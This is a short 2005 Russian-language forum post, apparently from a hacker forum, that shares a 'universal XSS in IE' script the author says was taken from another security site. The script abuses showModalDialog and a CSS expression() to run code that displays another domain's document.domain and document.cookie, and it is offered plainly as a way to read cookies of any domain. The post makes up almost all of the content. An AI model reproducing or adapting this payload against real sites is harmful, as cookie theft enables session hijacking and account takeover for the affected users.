20.06.2005, 22:00
|
|
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
С нами:
11627066
Репутация:
42
|
|
Универсальный Xss в Ie
с помощью этого скрипта можно получить доступ к cookies любого домена
Код:
<SCRIPT>
showModalDialog("http://forum.antichat.ru",null,"font-size:expression(window.execScript(unescape('alert%28%22Domain%3A%22+document.domain+%22%5CnCookie%3A%22+document.cookie%29%3Bwindow.close%28%29%3B')))");
</SCRIPT>
взял с секлаба |
|
|